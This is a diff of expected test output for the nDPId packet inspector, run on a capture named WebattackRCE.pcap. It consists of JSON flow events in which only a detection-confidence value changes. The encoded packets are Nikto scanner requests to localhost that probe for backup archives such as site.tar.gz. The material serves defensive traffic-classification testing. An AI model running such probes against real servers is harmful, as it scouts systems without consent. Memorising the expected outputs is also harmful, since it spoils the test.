00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276891,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/ZdAAEAGPpl\/AAABfwAAAcKmH5DYD8XTrc+7CoAYAED+uQAAAQEICp1m+8OdZvvDR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276893,"pkt":"AAAAAAAAAAAAAAAACABFAADFI6xAAEAGGIV\/AAABfwAAAcKoH5Ar0hvuzfCq7oAYAED+uQAAAQEICp1m+8WdZvvFR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276894,"pkt":"AAAAAAAAAAAAAAAACABFAADDA5ZAAEAGOJ1\/AAABfwAAAcKqH5B\/mzvUPuYs44AYAED+twAAAQEICp1m+8adZvvGR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276896,"pkt":"AAAAAAAAAAAAAAAACABFAADD\/SZAAEAGPwx\/AAABfwAAAcKsH5AB18VtW5jVeIAYAED+twAAAQEICp1m+8idZvvIR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276897,"pkt":"AAAAAAAAAAAAAAAACABFAADFBrJAAEAGNX9\/AAABfwAAAcKuH5Ayaz75EQ6Mk4AYAED+uQAAAQEICp1m+8mdZvvJR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276900,"pkt":"AAAAAAAAAAAAAAAACABFAADFczBAAEAGyQB\/AAABfwAAAcKwH5A3G0tor3ywHoAYAED+uQAAAQEICp1m+8ydZvvMR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276901,"pkt":"AAAAAAAAAAAAAAAACABFAADD0l1AAEAGadV\/AAABfwAAAcKyH5CdU+oT47LjtYAYAED+twAAAQEICp1m+82dZvvNR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276903,"pkt":"AAAAAAAAAAAAAAAACABFAADDR55AAEAG9JR\/AAABfwAAAcK0H5AcfX\/WOy6jEYAYAED+twAAAQEICp1m+8+dZvvOR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 